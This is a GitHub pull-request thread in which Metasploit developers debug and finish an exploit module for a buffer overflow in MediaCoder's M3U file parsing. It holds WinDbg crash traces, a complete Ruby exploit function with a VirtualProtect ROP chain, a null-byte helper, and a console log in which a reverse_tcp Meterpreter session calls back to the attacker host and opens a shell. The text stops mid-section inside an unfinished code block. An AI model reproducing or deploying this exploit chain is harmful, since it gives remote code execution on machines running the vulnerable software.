eax=00000000 ebx=db516e95 ecx=6afd4435 edx=77ba71cd esi=5faa8b36 edi=458cbb9f
eip=6afd443f esp=0012f314 ebp=859ed87c iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd esp L1
0012f314  4e471017  <--- Random data

0:000> dd esp+0x168 L1
0012f47c  6ab16202  <--- We are 0x168 bytes off to this

I'm not very sure why the starting ESP is so different even though we're all on Win 7 SP1. I can only assume maybe somewhere during window subclassing, the system decided to do something different - a condition we need to control.
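
The diagnosis in the two traces above comes down to one question: when the `ret` in postproc-52.dll executes, does the dword at ESP point into a loaded module (the XP run, where it is 6ab16202 in swscale-2.dll) or into unmapped memory (the Win 7 run, where it is 87ae76d4 and the process faults at `87ae76d4 ?? ???`)? The script below is an added example for this thread, not code from the PR or Metasploit. It does by hand what `dds` does in the debugger: it builds a module map from `ModLoad:` lines, annotates each dword of a `dd esp` dump with the module it points into, and checks the ESP arithmetic (`add esp,7ACh` plus four pops) that the traces show. The sample text is constructed from the values in the thread; the module map is the Win 7 `ModLoad` list and is assumed to hold for the XP dump too, since both runs use the same 6ab16202 address.

```python
"""Annotate a WinDbg `dd esp` dump with the module each dword points into.

Added example for this thread, not code from the PR or Metasploit. Used to
triage a crash reproduction: a return target inside a loaded module versus
one in unmapped memory (an immediate access violation, as on Win 7 above).
"""
import re

MODLOAD_RE = re.compile(r"^ModLoad:\s+([0-9a-fA-F]{8})\s+([0-9a-fA-F]{8})\s+(\S.*)$")
DD_RE = re.compile(r"^([0-9a-fA-F]{8})\s+((?:[0-9a-fA-F]{8}\s*)+)")

# Constructed from the Win 7 ModLoad list in the thread (three of the modules).
SAMPLE_MODLOADS = """\
ModLoad: 00400000 005c7000   C:\\Program Files\\MediaCoder\\mediacoder.exe
ModLoad: 6afc0000 6afeb000   C:\\Program Files\\MediaCoder\\postproc-52.dll
ModLoad: 6ab00000 6ab5b000   C:\\Program Files\\MediaCoder\\swscale-2.dll
"""
# `dd esp` at the `ret` on XP (first dword lands in swscale-2.dll) ...
XP_DUMP = "0012f4bc  6ab16202 6ab16202 6ab16202 100482ff\n"
# ... and on Win 7, where the first dword is random data.
WIN7_DUMP = "0012f314  87ae76d4 98f5b5e2 1a7c0e92 33f07a57\n"


def parse_modloads(text):
    """Return a list of (start, end, basename) from ModLoad: lines."""
    mods = []
    for line in text.splitlines():
        m = MODLOAD_RE.match(line)
        if m:
            path = m.group(3).strip()
            mods.append((int(m.group(1), 16), int(m.group(2), 16),
                         path.rsplit("\\", 1)[-1]))
    return mods


def module_for(addr, mods):
    """Name of the module whose [start, end) range contains addr, else None."""
    for start, end, name in mods:
        if start <= addr < end:
            return name
    return None


def parse_dd(text):
    """Return [(address, value), ...] from `dd` output (4 dwords per line)."""
    out = []
    for line in text.splitlines():
        m = DD_RE.match(line)
        if not m:
            continue
        base = int(m.group(1), 16)
        for i, word in enumerate(m.group(2).split()):
            out.append((base + 4 * i, int(word, 16)))
    return out


def annotate(dump_text, mods):
    """Like `dds`: each stack slot with the module its value points into."""
    return [(addr, val, module_for(val, mods)) for addr, val in parse_dd(dump_text)]


def esp_after_gadget(esp_at_entry, adjust=0x7AC, pops=4):
    """ESP at the `ret` after `add esp,7ACh; pop ebx; pop esi; pop edi; pop ebp`."""
    return esp_at_entry + adjust + 4 * pops


def triage_ret(dump_text, mods):
    """Classify the return target: the first dword at ESP in the dump."""
    addr, val = parse_dd(dump_text)[0]
    name = module_for(val, mods)
    return {"esp": addr, "target": val, "module": name, "mapped": name is not None}


if __name__ == "__main__":
    mods = parse_modloads(SAMPLE_MODLOADS)
    # Both Win 7 traces hit the breakpoint with esp=0012eb58 and ret with esp=0012f314.
    print("ret esp = %08x" % esp_after_gadget(0x0012EB58))
    for label, dump in (("XP", XP_DUMP), ("Win 7", WIN7_DUMP)):
        print(label, triage_ret(dump, mods))
        for addr, val, name in annotate(dump, mods):
            print("  %08x  %08x  %s" % (addr, val, name or "(unmapped)"))
```

The `esp_after_gadget` check is the part worth keeping in a triage notebook: it confirms from the register dump alone that 0012eb58 + 0x7AC + 4 pops is 0012f314, so the two Win 7 runs really did reach the `ret` with identical ESP, and the difference between the runs is only in what the stack held there.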

modpr0be commented Jul 9, 2013

I did more testing with another physical box, MediaCoder 0.8.23.5530 with Win 7.

(1008.14cc): Break instruction exception - code 80000003 (first chance)
eax=7ffdd000 ebx=00000000 ecx=00000000 edx=7791d5cb esi=00000000 edi=00000000
eip=778b3258 esp=0185ff5c ebp=0185ff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll - 
ntdll!DbgBreakPoint:
778b3258 cc              int     3
0:013> g
ModLoad: 6d900000 6d958000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 73ac0000 73bbb000   C:\Windows\system32\WindowsCodecs.dll
ModLoad: 6dd70000 6dda1000   C:\Windows\system32\EhStorShell.dll
ModLoad: 762e0000 7647d000   C:\Windows\system32\SETUPAPI.dll
ModLoad: 75a70000 75a97000   C:\Windows\system32\CFGMGR32.dll
ModLoad: 75a50000 75a62000   C:\Windows\system32\DEVOBJ.dll
ModLoad: 74550000 74645000   C:\Windows\system32\PROPSYS.dll
ModLoad: 6dd00000 6dd6a000   C:\Windows\System32\cscui.dll
ModLoad: 6dcf0000 6dcf9000   C:\Windows\System32\CSCDLL.dll
ModLoad: 723c0000 723cb000   C:\Windows\system32\CSCAPI.dll
ModLoad: 6dc80000 6dcef000   C:\Windows\system32\ntshrui.dll
ModLoad: 75720000 75739000   C:\Windows\system32\srvcli.dll
ModLoad: 741e0000 741ea000   C:\Windows\system32\slc.dll
ModLoad: 73c40000 73c6f000   C:\Windows\system32\xmllite.dll
ModLoad: 6d990000 6da24000   C:\Windows\system32\MsftEdit.dll
ModLoad: 73c40000 73c6f000   C:\Windows\system32\xmllite.dll
ModLoad: 68bb0000 68c3c000   C:\Windows\system32\UIAutomationCore.dll
ModLoad: 75960000 759bf000   C:\Windows\system32\SXS.DLL
ModLoad: 68b20000 68b7c000   C:\Windows\System32\StructuredQuery.dll
ModLoad: 757a0000 757a8000   C:\Windows\System32\Secur32.dll
ModLoad: 6db00000 6db4e000   C:\Windows\system32\actxprxy.dll
ModLoad: 6e850000 6e87b000   C:\Program Files\Internet Explorer\ieproxy.dll
ModLoad: 732c0000 732d6000   C:\Windows\system32\thumbcache.dll
ModLoad: 6e9a0000 6ea3f000   C:\Windows\system32\SearchFolder.dll
ModLoad: 6dad0000 6dafe000   C:\Windows\system32\SHDOCVW.dll
ModLoad: 6d270000 6d408000   C:\Windows\system32\NetworkExplorer.dll
ModLoad: 73080000 73092000   C:\Windows\system32\MPR.dll
ModLoad: 73200000 73208000   C:\Windows\System32\drprov.dll
ModLoad: 74c50000 74c79000   C:\Windows\System32\WINSTA.dll
ModLoad: 696f0000 69704000   C:\Windows\System32\ntlanman.dll
ModLoad: 6c0f0000 6c107000   C:\Windows\System32\davclnt.dll
ModLoad: 6fdd0000 6fdd8000   C:\Windows\System32\DAVHLPR.dll
ModLoad: 6dac0000 6dac9000   C:\Windows\system32\LINKINFO.dll
ModLoad: 74dd0000 74ddf000   C:\Windows\system32\wkscli.dll
ModLoad: 75200000 75209000   C:\Windows\system32\netutils.dll
(1008.17e4): Unknown exception - code 000006ba (first chance)
ModLoad: 66550000 66788000   C:\Windows\system32\wpdshext.dll
ModLoad: 74e00000 74f90000   C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
ModLoad: 6fd40000 6fdc9000   C:\Windows\system32\PortableDeviceApi.dll
ModLoad: 6edc0000 6edeb000   C:\Windows\system32\PortableDeviceTypes.dll
ModLoad: 696b0000 696ef000   C:\Windows\system32\audiodev.dll
ModLoad: 67b30000 67d97000   C:\Windows\system32\WMVCore.DLL
ModLoad: 69650000 6968d000   C:\Windows\system32\WMASF.DLL
ModLoad: 68b80000 68ba2000   C:\Windows\system32\EhStorAPI.dll
ModLoad: 05a70000 05ad1000   image05a70000
ModLoad: 05a70000 05ad1000   image05a70000
(1008.988): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000005e ebx=764dcc28 ecx=04d61b28 edx=fb3ce4d8 esi=005308c8 edi=000a032a
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210286
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at 7cc6f481
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> t
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\jpeg.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\jpeg.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\libiconv-2.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\avutil-52.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll - 
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=6ab16202
eip=6ab16202 esp=0012f468 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
swscale_2!sws_get_class+0xf002:
6ab16202 c3              ret

ESP points to:

0:000> dd esp
0012f468  6ab16202 6ab16202 6ab16202 6ab16202
0012f478  6ab16202 6ab16202 6ab16202 6ab16202
0012f488  100482ff ffffffc0 63547658 66d9d9ba
0012f498  6ab2241d 4b657443 4b657443 4b657443
0012f4a8  4b657443 4b657443 4b657443 4b657443
0012f4b8  4b657443 4b657443 4b657443 4b657443
0012f4c8  4b657443 4b657443 4b657443 4b657443
0012f4d8  1004cc03 6ab561b0 66d9feee 6ab19780
0:000> dd /c1 esp
0012f468  6ab16202
0012f46c  6ab16202
0012f470  6ab16202
0012f474  6ab16202
0012f478  6ab16202
0012f47c  6ab16202
0012f480  6ab16202
0012f484  6ab16202
0012f488  100482ff
0012f48c  ffffffc0
0012f490  63547658
0012f494  66d9d9ba
0012f498  6ab2241d
0012f49c  4b657443
0012f4a0  4b657443
0012f4a4  4b657443
0012f4a8  4b657443
0012f4ac  4b657443
0012f4b0  4b657443
0012f4b4  4b657443
0012f4b8  4b657443
0012f4bc  4b657443
0012f4c0  4b657443
0012f4c4  4b657443
0012f4c8  4b657443
0012f4cc  4b657443
0012f4d0  4b657443
0012f4d4  4b657443
0012f4d8  1004cc03
0012f4dc  6ab561b0
0012f4e0  66d9feee
0012f4e4  6ab19780

Windows version:

0:000> version
Windows 7 Version 7600 MP (4 procs) Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.1.7600.16385 (win7_rtm.090713-1255)
Machine Name:
Debug session time: Tue Jul  9 10:57:48.363 2013 (GMT+7)
System Uptime: 0 days 0:23:06.472
Process Uptime: 0 days 0:09:18.685
  Kernel time: 0 days 0:00:01.138
  User time: 0 days 0:00:00.546
Live user mode: <Local>

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.

command line: '"C:\Program Files\Debugging Tools for Windows (x86)\windbg.exe" '  Debugger Process 0x173C 
dbgeng:  image 6.11.0001.404, built Thu Feb 26 08:55:43 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbgeng.dll]
dbghelp: image 6.11.0001.404, built Thu Feb 26 08:55:30 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
        DIA version: 11212
Extension DLL search Path:
    C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files\Common Files\Lenovo;C:\Program Files\Common Files\Ulead Systems\MPEG;C:\Program Files\Lenovo\Access Connections\;C:\Program Files\Lenovo\Client Security Solution
Extension DLL chain:
    dbghelp: image 6.11.0001.404, API 6.1.6, built Thu Feb 26 08:55:30 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
    ext: image 6.11.0001.404, API 1.0.0, built Thu Feb 26 08:55:30 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll]
    exts: image 6.11.0001.404, API 1.0.0, built Thu Feb 26 08:55:24 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll]
    uext: image 6.11.0001.404, API 1.0.0, built Thu Feb 26 08:55:26 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\uext.dll]
    ntsdexts: image 6.1.7015.0, API 1.0.0, built Thu Feb 26 08:54:43 2009
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\ntsdexts.dll]

Same result as mine. Any idea how to resolve this? Maybe add more ROP NOPs (0x00000168). It would be good if this module supported DEP, since mediacoder.exe is DEP aware.

@modpr0be modpr0be closed this Jul 9, 2013
@modpr0be modpr0be reopened this Jul 9, 2013
@modpr0be
Contributor Author

modpr0be commented Jul 9, 2013

Errh, accidentally clicked the close & comment button.

@corelanc0d3r
Contributor

It's not that uncommon to see offset differences between Win7 x86 and Win7 x64 (wow64); a ROP NOP landing zone should take care of that.

@wchen-r7
Contributor

wchen-r7 commented Jul 9, 2013

I see modpr0be tested on a Win 7 SP0 box based on his kernel32.dll info, so I set up the same Win 7 box, and then I got it to work:

Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=7756660d esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> p
eax=00000000 ebx=00000000 ecx=6afd4435 edx=7756660d esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=7756660d esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=7756660d esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=7756660d esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=7756660d esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd esp L1
0012f464  6ab16202  <-- Landed on the ROP NOP we want

So perhaps the offset is more specific to the service pack, rather than wow64 vs x86 this time?? I think Juan has been testing on Win 7 SP1, right? If the module doesn't work reliably on SP1, then I suggest:

  1. Add Win 7 SP1 as a new target, and then pad 0x186 bytes of ROP NOPs to make sure it lands correctly.
  2. Ignore the Win 7 SP1 target for now. Modify the current module target description to "MediaCoder 0.8.23.5530 / Windows XP SP3 / Windows 7 SP0"

Either way works for me.

@modpr0be
Contributor Author

modpr0be commented Jul 9, 2013

Actually, my test before the last one was tested in Win 7 SP1:

0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at e82d1026
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76f371ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> p
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76f371ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd esp L1
0012f464  6ab16202     <-------- Hit the rop nop as we wanted.

Windows version:

0:000> version
Windows 7 Version 7601 (Service Pack 1) MP (2 procs) Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.1.7601.18015 (win7sp1_gdr.121129-1432)
Machine Name:
Debug session time: Tue Jul  9 12:49:47.327 2013 (UTC + 7:00)
System Uptime: 0 days 0:08:58.106
Process Uptime: 0 days 0:03:30.334
  Kernel time: 0 days 0:00:01.747
  User time: 0 days 0:00:02.137
Live user mode: <Local>

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

command line: '"C:\Program Files\Debugging Tools for Windows (x86)\windbg.exe" '  Debugger Process 0x15D4 
dbgeng:  image 6.12.0002.633, built Tue Feb 02 03:08:31 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbgeng.dll]
dbghelp: image 6.12.0002.633, built Tue Feb 02 03:08:26 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
        DIA version: 20921
Extension DLL search Path:
    C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Python27;C:\Python27\Lib;C:\Program Files\GNU\GnuPG\pub;C:\Program Files\Windows Live\Shared;C:\Program Files\QuickTime\QTSystem\;C:\Program Files\Microsoft Windows Performance Toolkit\;C:\Program Files\OpenVPN\bin;C:\Program Files\Nmap
Extension DLL chain:
    dbghelp: image 6.12.0002.633, API 6.1.6, built Tue Feb 02 03:08:26 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
    ext: image 6.12.0002.633, API 1.0.0, built Tue Feb 02 03:08:31 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll]
    exts: image 6.12.0002.633, API 1.0.0, built Tue Feb 02 03:08:24 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll]
    uext: image 6.12.0002.633, API 1.0.0, built Tue Feb 02 03:08:23 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\uext.dll]
    ntsdexts: image 6.1.7650.0, API 1.0.0, built Tue Feb 02 03:08:08 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\ntsdexts.dll]

@wchen-r7
Contributor

wchen-r7 commented Jul 9, 2013

I fixed the exploit() function to make it work on my box. Although it works, it's not ideal, because the pivot adjusts ESP so much (0x7AC) that it forces my payload very close to the edge of the uncommitted memory. That pretty much means that if my payload is too big, the VirtualProtect call won't be able to mark the region RWX. I had to make the size parameter dynamic, because the original hardcoded value to NEG is too big.

To overcome the size problem above, it's possible to put an egghunter (one that uses VirtualProtect, too) in place of the payload, and then look for a way to put the payload somewhere else for the hunter to find. But I didn't investigate this approach further.

I'm not even sure whether this modified function breaks the current one, but anyway, here's my version:

def exploit
    # fixed rop from mona.py :)
    p = payload.encoded
    rop_gadgets =
    [
        nops(true,35+491),  # ROP NOP
        0x100482ff, # POP EAX # POP EBP # RETN
        0xffffffc0, # negate will become 0x00000040
        junk,
        0x66d9d9ba, # NEG EAX # RETN
        0x6ab2241d, # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN
        junk(15),   # reserve more junk for add esp,2c
        0x1004a8ee, # POP ECX # RETN
        0x6ab561b0, # ptr to &VirtualProtect()
        0x66d9feee, # MOV EAX,DWORD PTR DS:[ECX] # RETN
        0x6ab19780, # XCHG EAX,ESI # RETN
        0x66d929f5, # POP EAX # POP EBX # RETN
        0xffffffff - p.length + 1,
        junk,
        0x6ab3c65a, # NEG EAX # RETN
        0x1004cc03, # POP ECX # RETN
        0xffffffff, #
        0x660166e9, # INC ECX # SUB AL,0EB # RETN
        0x66d8ae48, # XCHG ECX,EBX # RETN
        0x1005f6e4, # ADD EBX,EAX # OR EAX,3000000 # RETN
        0x6ab3d688, # POP ECX # RETN
        0x6ab4ead0, # Writable address
        0x100444e3, # POP EDI # RETN
        nops(true), # ROP NOP
        0x10048377, # POP EAX # POP EBP # RETN
        nops,       # Regular NOPs
        0x6ab01c06, # PUSH ESP# RETN
        0x6ab28dda, # PUSHAD # RETN
    ].flatten.pack("V*")

    retn_nops = [0x6afc1446].pack('V') # RETN 0x0C in postproc.dll
    sploit = "http://A"
    sploit << retn_nops*(target['Offset']/4)
    sploit << [target.ret].pack('V')
    sploit << rop_gadgets
    sploit << make_nops(16)
    sploit << p
    sploit << rand_text(target['Max']-sploit.length)

    file_create(sploit)
end

@jvazquez-r7
Contributor

Working on W7 SP1 after applying @wchen-r7's changes:

msf exploit(mediacoder_m3u) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mediacoder_m3u) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(mediacoder_m3u) > rexploit
[*] Reloading module...

[+] msf.m3u stored at /Users/juan/.msf4/local/msf.m3u
msf exploit(mediacoder_m3u) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > expliot
[-] Unknown command: expliot.
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.147
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.147:49723) at 2013-07-09 12:56:55 -0500

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

@corelanc0d3r
Contributor

If the payload cannot contain nulls, then perhaps a check is needed to ensure that "0xffffffff - p.length + 1" will never contain a null byte.
Also, I think a VirtualAlloc chain would not have the size issue.

@wchen-r7
Contributor

I don't really have a pretty way to do this, but to avoid a null byte in his length value, I guess he can do something like:

#
# Returns a value to NEG that doesn't contain a null byte
#
def get_neg_value(payload_length)
    v = [0xffffffff - payload_length + 1].pack('V')

    while v =~ /\x00/
        payload_length += 1
        v = [0xffffffff - payload_length + 1].pack('V')     
    end

    v
end


#
# Tests the get_neg_value function
#
1.step(2048, 1) do |i|
    print "Testing: #{i.to_s}"
    orig = [0xffffffff - i + 1].pack('V')
    v    = get_neg_value(i)

    if orig == v
        puts "... value unchanged."
    else
        puts "... value changed: #{orig.unpack("H*")[0]} to #{v.unpack("H*")[0]}"
    end
end
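
The null-byte concern raised by corelanc0d3r and the get_neg_value helper above, generalized as an added example (this is editor-supplied code, not the module's or the PR's) to an arbitrary bad-character set. It also checks the round trip: the dword that goes into the chain must NEG back to a usable value, and for a VirtualProtect size a slightly larger region is harmless, so the value is bumped until its encoding is clean. The two reference values are taken from the traces in this thread: 0xffffffc0 NEGs to 0x40 (PAGE_EXECUTE_READWRITE), and 0xffffff1b is the encoding of a 229-byte payload.

```ruby
# Added example, not code from the MediaCoder module or this PR.
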